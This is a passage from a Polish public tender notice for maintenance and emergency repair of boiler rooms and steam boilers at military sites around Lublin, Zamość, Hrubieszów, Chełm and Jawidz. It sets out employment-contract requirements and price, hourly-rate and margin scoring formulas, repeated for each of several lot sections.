nr 1d do SWZ;<br/>5)	Szczegółowy opis przedmiotu zamówienia w zakresie części nr 5 – stanowiący Załącznik nr 1e do SWZ;<br/><br/>UWAGA! Zamawiający zamieścił powyższe załączniki, tj.: szczegółowe opisy przedmiotu zamówienia w zakresie części nr 1, 2, 3, 4, 5, spakowane <br/>w jednym pliku w formacie ZIP, który został zamieszczony na platformie zakupowej w zakładce „Załączniki do postępowania” jako załącznik nr 1 do SWZ<br/>7.	Zamawiający wymaga zatrudnienia przez Wykonawcę lub Podwykonawcę na podstawie umowy o pracę osób wykonujących wskazane przez Zamawiającego czynności w zakresie realizacji zamówienia, jeżeli wykonanie tych czynności polega na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. – Kodeks pracy (Dz. U. z 2023 r. poz.1465 tekst jednolity z późniejszymi zmianami) - stosownie do postanowień art. 95, art. 96, art. 438 Pzp:<br/><br/>1)	Wykonawca zobowiązuje się przed podpisaniem Umowy lub w terminie 7 dni kalendarzowych od chwili powstania obowiązku zatrudnienia pracowników na podstawie Umowy o pracę i na każde żądanie Zamawiającego dostarczyć Zamawiającemu Wykaz osób przewidzianych do realizacji Umowy z uwzględnieniem imienia i nazwiska, stanowiska, rodzaju umowy o pracę oraz okres na jaki została zawarta (wzór wykazu stanowi załącznik do niniejszej umowy). Wykaz ten będzie stanowił integralną część Umowy. Ww. obowiązek dotyczy także Podwykonawców.<br/><br/>2)	Wykonawca lub Podwykonawca (w przypadku realizacji zamówienia przy udziale podwykonawców) jest zobowiązany zatrudnić na podstawie umowy o pracę określonej w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. Kodeks pracy (Dz.U. z 2023r. poz. 1465 z późn. zm.) pracowników, którzy w okresie realizacji Umowy będą wykonywać czynności, tj.:<br/><br/>	Wykonawca świadczący usługę powinien zatrudnić na podstawie umowy o pracę osoby bezpośrednio związane z realizacją umowy, czyli osoby dokonujące przeglądów i konserwacji oraz wykonujące montaż i demontaż jak i naprawy awaryjne i eksploatacyjne urządzeń i instalacji kotłowni gazowych, kotłów warzelnianych i parowych. Wykonujących pomiary w zakresie instalacji elektrycznej, gazowej wg. obowiązujących norm i przepisów. <br/><br/>3)	Uprawnienia Zamawiającego w zakresie kontroli spełnienia przez Wykonawcę wymogu zatrudnienia w/w osób na podstawie umowy o pracę oraz sankcji z tytułu niespełnienia tych wymagań zostały określone we wzorze umowy stanowiącym załącznik do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50800000-3 - Różne usługi w zakresie napraw i konserwacji</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">w zakresie część nr 1, 2, 3, 4, 5:<br/><br/>1)	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>	waga 60 % – Cena wartość wynagrodzenia za konserwacje i przeglądy <br/>	waga 20% – Cena roboczogodziny – dla napraw awaryjnych i eksploatacyjnych <br/>	waga 20 % - Marża - dodanej do wartości zakupu części i materiałów użytych do napraw awaryjnych oraz eksploatacyjnych<br/><br/>Zasady oceny ofert w poszczególnych kryteriach:<br/>	waga 60 % – Cena - wartość wynagrodzenia za konserwacje i przeglądy <br/> <br/>liczone według wzoru:<br/><br/> C min <br/> C o = ---------- x 100 x 60 %<br/> C B<br/>C o - liczba punktów uzyskanych przez ofertę badaną ( po zaokrągleniu do dwóch miejsc po przecinku)w kryterium ceny 60 % <br/>C min – najniższa zaproponowana cena wśród ofert niepodlegających odrzuceniu <br/>C B - zaproponowana cena oferty badanej<br/><br/>	waga 20% – Cena roboczogodziny – dla napraw awaryjnych i eksploatacyjnych <br/><br/> C r.min <br/>C r = ---------- x 100 x 20 %<br/> C r.of.<br/><br/>C r - liczba punktów uzyskanych przez ofertę badaną ( po zaokrągleniu do dwóch miejsc po przecinku)w kryterium roboczogodzina 20 % C r.min – najniższa zaproponowana roboczogodzina wśród ofert niepodlegających odrzuceniu<br/>C r.of.- zaproponowana cena roboczogodziny w badanej ofercie <br/><br/><br/>	waga 20 % - Marża <br/><br/> M min <br/>M o = ---------- x 100 x 20 %<br/> M of. <br/><br/>M o - liczba punktów uzyskanych przez ofertę badaną ( po zaokrągleniu do dwóch miejsc po przecinku)w kryterium marża 20 % M min – najniższa zaproponowana marża wśród ofert niepodlegających odrzuceniu<br/>M of. - zaproponowana wartość marży w badanej ofercie <br/><br/>UWAGA: W przypadku niewskazania w ofercie marży w ogóle – oferta zostanie odrzucona.<br/><br/><br/><br/>Sposób wyboru najkorzystniejszej oferty:<br/><br/>Najkorzystniejsza oferta = oferta z największą liczbą punktów LP<br/>LP = CO + C r + M o <br/>gdzie: LP – wyliczona ilość punktów badanej oferty</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">cena roboczogodziny dla napraw awaryjnych i eksploatacyjnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">marża</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: usługa konserwacji, przeglądów, pogotowia technicznego oraz wykonywanie napraw awaryjnych w zakresie urządzeń i instalacji kotłowni gazowych, kotłowni olejowych, kotłów warzelnych oraz parowych w kompleksach wojskowych w miejscowości Lublin, Jawidz , Zamość, Hrubieszów, Chełm – w zakresie 5 (pięciu) części:<br/>•	Cześć Nr 1 konserwacje, przeglądy na terenie komp. w m. LUBLIN<br/>•	Część Nr 2 konserwacje, przeglądy na terenie komp. w m. Jawidz<br/>•	Część Nr 3 konserwacje, przeglądy na terenie komp. w m. ZAMOŚĆ<br/>•	Część Nr 4 konserwacje, przeglądy na terenie komp. w m. Hrubieszów<br/>•	Część Nr 5 konserwacje, przeglądy na terenie komp. w m. CHEŁM<br/><br/>Nr sprawy ZP/TP/85/2024.<br/>Kod CPV – 508 00000-3 Różne usługi w zakresie napraw i konserwacji.<br/><br/>SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA<br/><br/>Szczegółowy opis przedmiotu zamówienia w zakresie części nr 1, części nr 2, części nr 3, części nr 4, części nr 5, określają:<br/>1)	Szczegółowy opis przedmiotu zamówienia w zakresie części nr 1 – stanowiący Załącznik nr 1a do SWZ;<br/>2)	Szczegółowy opis przedmiotu zamówienia w zakresie części nr 2 – stanowiący Załącznik nr 1b do SWZ;<br/>3)	Szczegółowy opis przedmiotu zamówienia w zakresie części nr 3 – stanowiący Załącznik nr 1c do SWZ;<br/>4)	Szczegółowy opis przedmiotu zamówienia w zakresie części nr 4 – stanowiący Załącznik nr 1d do SWZ;<br/>5)	Szczegółowy opis przedmiotu zamówienia w zakresie części nr 5 – stanowiący Załącznik nr 1e do SWZ;<br/><br/>UWAGA! Zamawiający zamieścił powyższe załączniki, tj.: szczegółowe opisy przedmiotu zamówienia w zakresie części nr 1, 2, 3, 4, 5, spakowane <br/>w jednym pliku w formacie ZIP, który został zamieszczony na platformie zakupowej w zakładce „Załączniki do postępowania” jako załącznik nr 1 do SWZ. <br/>7.	Zamawiający wymaga zatrudnienia przez Wykonawcę lub Podwykonawcę na podstawie umowy o pracę osób wykonujących wskazane przez Zamawiającego czynności w zakresie realizacji zamówienia, jeżeli wykonanie tych czynności polega na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. – Kodeks pracy (Dz. U. z 2023 r. poz.1465 tekst jednolity z późniejszymi zmianami) - stosownie do postanowień art. 95, art. 96, art. 438 Pzp:<br/><br/>1)	Wykonawca zobowiązuje się przed podpisaniem Umowy lub w terminie 7 dni kalendarzowych od chwili powstania obowiązku zatrudnienia pracowników na podstawie Umowy o pracę i na każde żądanie Zamawiającego dostarczyć Zamawiającemu Wykaz osób przewidzianych do realizacji Umowy z uwzględnieniem imienia i nazwiska, stanowiska, rodzaju umowy o pracę oraz okres na jaki została zawarta (wzór wykazu stanowi załącznik do niniejszej umowy). Wykaz ten będzie stanowił integralną część Umowy. Ww. obowiązek dotyczy także Podwykonawców.<br/><br/>2)	Wykonawca lub Podwykonawca (w przypadku realizacji zamówienia przy udziale podwykonawców) jest zobowiązany zatrudnić na podstawie umowy o pracę określonej w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. Kodeks pracy (Dz.U. z 2023r. poz. 1465 z późn. zm.) pracowników, którzy w okresie realizacji Umowy będą wykonywać czynności, tj.:<br/><br/>	Wykonawca świadczący usługę powinien zatrudnić na podstawie umowy o pracę osoby bezpośrednio związane z realizacją umowy, czyli osoby dokonujące przeglądów i konserwacji oraz wykonujące montaż i demontaż jak i naprawy awaryjne i eksploatacyjne urządzeń i instalacji kotłowni gazowych, kotłów warzelnianych i parowych. Wykonujących pomiary w zakresie instalacji elektrycznej, gazowej wg. obowiązujących norm i przepisów. <br/><br/>3)	Uprawnienia Zamawiającego w zakresie kontroli spełnienia przez Wykonawcę wymogu zatrudnienia w/w osób na podstawie umowy o pracę oraz sankcji z tytułu niespełnienia tych wymagań zostały określone we wzorze umowy stanowiącym załącznik do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50800000-3 - Różne usługi w zakresie napraw i konserwacji</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">w zakresie część nr 1, 2, 3, 4, 5:<br/><br/>1)	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>	waga 60 % – Cena wartość wynagrodzenia za konserwacje i przeglądy <br/>	waga 20% – Cena roboczogodziny – dla napraw awaryjnych i eksploatacyjnych <br/>	waga 20 % - Marża - dodanej do wartości zakupu części i materiałów użytych do napraw awaryjnych oraz eksploatacyjnych<br/><br/>Zasady oceny ofert w poszczególnych kryteriach:<br/>	waga 60 % – Cena - wartość wynagrodzenia za konserwacje i przeglądy <br/> <br/>liczone według wzoru:<br/><br/> C min <br/> C o = ---------- x 100 x 60 %<br/> C B<br/>C o - liczba punktów uzyskanych przez ofertę badaną ( po zaokrągleniu do dwóch miejsc po przecinku)w kryterium ceny 60 % <br/>C min – najniższa zaproponowana cena wśród ofert niepodlegających odrzuceniu <br/>C B - zaproponowana cena oferty badanej<br/><br/>	waga 20% – Cena roboczogodziny – dla napraw awaryjnych i eksploatacyjnych <br/><br/> C r.min <br/>C r = ---------- x 100 x 20 %<br/> C r.of.<br/><br/>C r - liczba punktów uzyskanych przez ofertę badaną ( po zaokrągleniu do dwóch miejsc po przecinku)w kryterium roboczogodzina 20 % C r.min – najniższa zaproponowana roboczogodzina wśród ofert niepodlegających odrzuceniu<br/>C r.of.- zaproponowana cena roboczogodziny w badanej ofercie <br/><br/><br/>	waga 20 % - Marża <br/><br/> M min <br/>M o = ---------- x 100 x 20 %<br/> M of. <br/><br/>M o - liczba punktów uzyskanych przez ofertę badaną ( po zaokrągleniu do dwóch miejsc po przecinku)w kryterium marża 20 % M min – najniższa zaproponowana marża wśród ofert niepodlegających odrzuceniu<br/>M of. - zaproponowana wartość marży w badanej ofercie <br/><br/>UWAGA: W przypadku niewskazania w ofercie marży w ogóle – oferta zostanie odrzucona.<br/><br/><br/><br/>Sposób wyboru najkorzystniejszej oferty:<br/><br/>Najkorzystniejsza oferta = oferta z największą liczbą punktów LP<br/>LP = CO + C r + M o <br/>gdzie: LP – wyliczona ilość punktów badanej oferty</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena roboczogodziny dla napraw awaryjnych i eksploatacyjnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">marża</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: usługa konserwacji, przeglądów, pogotowia technicznego oraz wykonywanie napraw awaryjnych w zakresie urządzeń i instalacji kotłowni gazowych, kotłowni olejowych, kotłów warzelnych oraz parowych w kompleksach wojskowych w miejscowości Lublin, Jawidz , Zamość, Hrubieszów, Chełm – w zakresie 5 (pięciu) części:<br/>•	Cześć Nr 1 konserwacje, przeglądy na terenie komp. w m. LUBLIN<br/>•	Część Nr 2 konserwacje, przeglądy na terenie komp. w m. Jawidz<br/>•	Część Nr 3 konserwacje, przeglądy na terenie komp. w m. ZAMOŚĆ<br/>•	Część Nr 4 konserwacje, przeglądy na terenie komp. w m. Hrubieszów<br/>•	Część Nr 5 konserwacje, przeglądy na terenie komp. w m. CHEŁM<br/><br/>Nr sprawy ZP/TP/85/2024.<br/>Kod CPV – 508 00000-3 Różne usługi w zakresie napraw i konserwacji.<br/><br/>SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA<br/><br/>Szczegółowy opis przedmiotu zamówienia w zakresie części nr 1, części nr 2, części nr 3, części nr 4, części nr 5, określają:<br/>1)	Szczegółowy opis przedmiotu zamówienia w zakresie części nr 1 – stanowiący Załącznik nr 1a do SWZ;<br/>2)	Szczegółowy opis przedmiotu zamówienia w zakresie części nr 2 – stanowiący Załącznik nr 1b do SWZ;<br/>3)	Szczegółowy opis przedmiotu zamówienia w zakresie części nr 3 – stanowiący Załącznik nr 1c do SWZ;<br/>4)	Szczegółowy opis przedmiotu zamówienia w zakresie części nr 4 – stanowiący Załącznik nr 1d do SWZ;<br/>5)	Szczegółowy opis przedmiotu zamówienia w zakresie części nr 5 – stanowiący Załącznik nr 1e do SWZ;<br/><br/>UWAGA! Zamawiający zamieścił powyższe załączniki, tj.: szczegółowe opisy przedmiotu zamówienia w zakresie części nr 1, 2, 3, 4, 5, spakowane <br/>w jednym pliku w formacie ZIP, który został zamieszczony na platformie zakupowej w zakładce „Załączniki do postępowania” jako załącznik nr 1 do SWZ. <br/><br/><br/><br/>7.	Zamawiający wymaga zatrudnienia przez Wykonawcę lub Podwykonawcę na podstawie umowy o pracę osób wykonujących wskazane przez Zamawiającego czynności w zakresie realizacji zamówienia, jeżeli wykonanie tych czynności polega na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. – Kodeks pracy (Dz. U. z 2023 r. poz.1465 tekst jednolity z późniejszymi zmianami) - stosownie do postanowień art. 95, art. 96, art. 438 Pzp:<br/><br/>1)	Wykonawca zobowiązuje się przed podpisaniem Umowy lub w terminie 7 dni kalendarzowych od chwili powstania obowiązku zatrudnienia pracowników na podstawie Umowy o pracę i na każde żądanie Zamawiającego dostarczyć Zamawiającemu Wykaz osób przewidzianych do realizacji Umowy z uwzględnieniem imienia i nazwiska, stanowiska, rodzaju umowy o pracę oraz okres na jaki została zawarta (wzór wykazu stanowi załącznik do niniejszej umowy). Wykaz ten będzie stanowił integralną część Umowy. Ww. obowiązek dotyczy także Podwykonawców.<br/><br/>2)	Wykonawca lub Podwykonawca (w przypadku realizacji zamówienia przy udziale podwykonawców) jest zobowiązany zatrudnić na podstawie umowy o pracę określonej w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. Kodeks pracy (Dz.U. z 2023r. poz. 1465 z późn. zm.) pracowników, którzy w okresie realizacji Umowy będą wykonywać czynności, tj.:<br/><br/>	Wykonawca świadczący usługę powinien zatrudnić na podstawie umowy o pracę osoby bezpośrednio związane z realizacją umowy, czyli osoby dokonujące przeglądów i konserwacji oraz wykonujące montaż i demontaż jak i naprawy awaryjne i eksploatacyjne urządzeń i instalacji kotłowni gazowych, kotłów warzelnianych i parowych. Wykonujących pomiary w zakresie instalacji elektrycznej, gazowej wg. obowiązujących norm i przepisów. <br/><br/>3)	Uprawnienia Zamawiającego w zakresie kontroli spełnienia przez Wykonawcę wymogu zatrudnienia w/w osób na podstawie umowy o pracę oraz sankcji z tytułu niespełnienia tych wymagań zostały określone we wzorze umowy stanowiącym załącznik do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50800000-3 - Różne usługi w zakresie napraw i konserwacji</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">w zakresie część nr 1, 2, 3, 4, 5:<br/><br/>1)	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>	waga 60 % – Cena wartość wynagrodzenia za konserwacje i przeglądy <br/>	waga 20% – Cena roboczogodziny – dla napraw awaryjnych i eksploatacyjnych <br/>	waga 20 % - Marża - dodanej do wartości zakupu części i materiałów użytych do napraw awaryjnych oraz eksploatacyjnych<br/><br/>Zasady oceny ofert w poszczególnych kryteriach:<br/>	waga 60 % – Cena - wartość wynagrodzenia za konserwacje i przeglądy <br/> <br/>liczone według wzoru:<br/><br/> C min <br/> C o = ---------- x 100 x 60 %<br/> C B<br/>C o - liczba punktów uzyskanych przez ofertę badaną ( po zaokrągleniu do dwóch miejsc po przecinku)w kryterium ceny 60 % <br/>C min – najniższa zaproponowana cena wśród ofert niepodlegających odrzuceniu <br/>C B - zaproponowana cena oferty badanej<br/><br/>	waga 20% – Cena roboczogodziny – dla napraw awaryjnych i eksploatacyjnych <br/><br/> C r.min <br/>C r = ---------- x 100 x 20 %<br/> C r.of.<br/><br/>C r - liczba punktów uzyskanych przez ofertę badaną ( po zaokrągleniu do dwóch miejsc po przecinku)w kryterium roboczogodzina 20 % C r.min – najniższa zaproponowana roboczogodzina wśród ofert niepodlegających odrzuceniu<br/>C r.of.- zaproponowana cena roboczogodziny w badanej ofercie <br/><br/><br/>	waga 20 % - Marża <br/><br/> M min <br/>M o = ---------- x 100 x 20 %<br/> M of. <br/><br/>M o - liczba punktów uzyskanych przez ofertę badaną ( po zaokrągleniu do dwóch miejsc po przecinku)w kryterium marża 20 % M min – najniższa zaproponowana marża wśród ofert niepodlegających odrzuceniu<br/>M of. - zaproponowana wartość marży w badanej ofercie <br/><br/>UWAGA: W przypadku niewskazania w ofercie marży w ogóle – oferta zostanie odrzucona.<br/><br/><br/><br/>Sposób wyboru najkorzystniejszej oferty:<br/><br/>Najkorzystniejsza oferta = oferta z największą liczbą punktów LP<br/>LP = CO + C r + M o <br/>gdzie: LP – wyliczona ilość punktów badanej oferty</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena roboczogodziny dla napraw awaryjnych i eksploatacyjnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">marża</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: usługa konserwacji, przeglądów, pogotowia technicznego oraz wykonywanie napraw awaryjnych w zakresie urządzeń i instalacji kotłowni gazowych, kotłowni olejowych, kotłów warzelnych oraz parowych w kompleksach wojskowych w miejscowości Lublin, Jawidz , Zamość, Hrubieszów, Chełm – w zakresie 5 (pięciu) części:<br/>•	Cześć Nr 1 konserwacje, przeglądy na terenie komp. w m. LUBLIN<br/>•	Część Nr 2 konserwacje, przeglądy na terenie komp. w m. Jawidz<br/>•	Część Nr 3 konserwacje, przeglądy na terenie komp. w m. ZAMOŚĆ<br/>•	Część Nr 4 konserwacje, przeglądy na terenie komp. w m. Hrubieszów<br/>•	Część Nr 5 konserwacje, przeglądy na terenie komp. w m. CHEŁM<br/><br/>Nr sprawy ZP/TP/85/2024.<br/>Kod CPV – 508 00000-3 Różne usługi w zakresie napraw i konserwacji.<br/><br/>SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA<br/><br/>Szczegółowy opis przedmiotu zamówienia w zakresie części nr 1, części nr 2, części nr 3, części nr 4, części nr 5, określają:<br/>1)	Szczegółowy opis przedmiotu zamówienia w zakresie części nr 1 – stanowiący Załącznik nr 1a do SWZ;<br/>2)	Szczegółowy opis przedmiotu zamówienia w zakresie części nr 2 – stanowiący Załącznik nr 1b do SWZ;<br/>3)	Szczegółowy opis przedmiotu zamówienia w zakresie części nr 3 – stanowiący Załącznik nr 1c do SWZ;<br/>4)	Szczegółowy opis przedmiotu zamówienia w zakresie części nr 4 – stanowiący Załącznik nr 1d do SWZ;<br/>5)	Szczegółowy opis przedmiotu zamówienia w zakresie części nr 5 – stanowiący Załącznik nr 1e do SWZ;<br/><br/>UWAGA! Zamawiający zamieścił powyższe załączniki, tj.: szczegółowe opisy przedmiotu zamówienia w zakresie części nr 1, 2, 3, 4, 5, spakowane <br/>w jednym pliku w formacie ZIP, który został zamieszczony na platformie zakupowej w zakładce „Załączniki do postępowania” jako załącznik nr 1 do SWZ. <br/>7.	Zamawiający wymaga zatrudnienia przez Wykonawcę lub Podwykonawcę na podstawie umowy o pracę osób wykonujących wskazane przez Zamawiającego czynności w zakresie realizacji zamówienia, jeżeli wykonanie tych czynności polega na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. – Kodeks pracy (Dz. U. z 2023 r. poz.1465 tekst jednolity z późniejszymi zmianami) - stosownie do postanowień art. 95, art. 96, art. 438 Pzp:<br/><br/>1)	Wykonawca zobowiązuje się przed podpisaniem Umowy lub w terminie 7 dni kalendarzowych od chwili powstania obowiązku zatrudnienia pracowników na podstawie Umowy o pracę i na każde żądanie Zamawiającego dostarczyć Zamawiającemu Wykaz osób przewidzianych do realizacji Umowy z uwzględnieniem imienia i nazwiska, stanowiska, rodzaju umowy o pracę oraz okres na jaki została zawarta (wzór wykazu stanowi załącznik do niniejszej umowy). Wykaz ten będzie stanowił integralną część Umowy. Ww. obowiązek dotyczy także Podwykonawców.<br/><br/>2)	Wykonawca lub Podwykonawca (w przypadku realizacji zamówienia przy udziale podwykonawców) jest zobowiązany zatrudnić na podstawie umowy o pracę określonej w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. Kodeks pracy (Dz.U. z 2023r. poz. 1465 z późn. zm.) pracowników, którzy w okresie realizacji Umowy będą wykonywać czynności, tj.:<br/><br/>	Wykonawca świadczący usługę powinien zatrudnić na podstawie umowy o pracę osoby bezpośrednio związane z realizacją umowy, czyli osoby dokonujące przeglądów i konserwacji oraz wykonujące montaż i demontaż jak i naprawy awaryjne i eksploatacyjne urządzeń i instalacji kotłowni gazowych, kotłów warzelnianych i parowych. Wykonujących pomiary w zakresie instalacji elektrycznej, gazowej wg. obowiązujących norm i przepisów. <br/><br/>3)	Uprawnienia Zamawiającego w zakresie kontroli spełnienia przez Wykonawcę wymogu zatrudnienia w/w osób na podstawie umowy o pracę oraz sankcji z tytułu niespełnienia tych wymagań zostały określone we wzorze umowy stanowiącym załącznik do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50800000-3 - Różne usługi w zakresie napraw i konserwacji</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">w zakresie część nr 1, 2, 3, 4, 5:<br/><br/>1)	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>	waga 60 % – Cena wartość wynagrodzenia za konserwacje i przeglądy <br/>	waga 20% – Cena roboczogodziny – dla napraw awaryjnych i eksploatacyjnych <br/>	waga 20 % - Marża - dodanej do wartości zakupu części i materiałów użytych do napraw awaryjnych oraz eksploatacyjnych<br/><br/>Zasady oceny ofert w poszczególnych kryteriach:<br/>	waga 60 % – Cena - wartość wynagrodzenia za konserwacje i przeglądy <br/> <br/>liczone według wzoru:<br/><br/> C min <br/> C o = ---------- x 100 x 60 %<br/> C B<br/>C o - liczba punktów uzyskanych przez ofertę badaną ( po zaokrągleniu do dwóch miejsc po przecinku)w kryterium ceny 60 % <br/>C min – najniższa zaproponowana cena wśród ofert niepodlegających odrzuceniu <br/>C B - zaproponowana cena oferty badanej<br/><br/>	waga 20% – Cena roboczogodziny – dla napraw awaryjnych i eksploatacyjnych <br/><br/> C r.min <br/>C r = ---------- x 100 x 20 %<br/> C r.of.<br/><br/>C r - liczba punktów uzyskanych przez ofertę badaną ( po zaokrągleniu do dwóch miejsc po przecinku)w kryterium roboczogodzina 20 % C r.min – najniższa zaproponowana roboczogodzina wśród ofert niepodlegających odrzuceniu<br/>C r.of.- zaproponowana cena roboczogodziny w badanej ofercie <br/><br/><br/>	waga 20 % - Marża <br/><br/> M min <br/>M o = ---------- x 100 x 20 %<br/> M of. <br/><br/>M o - 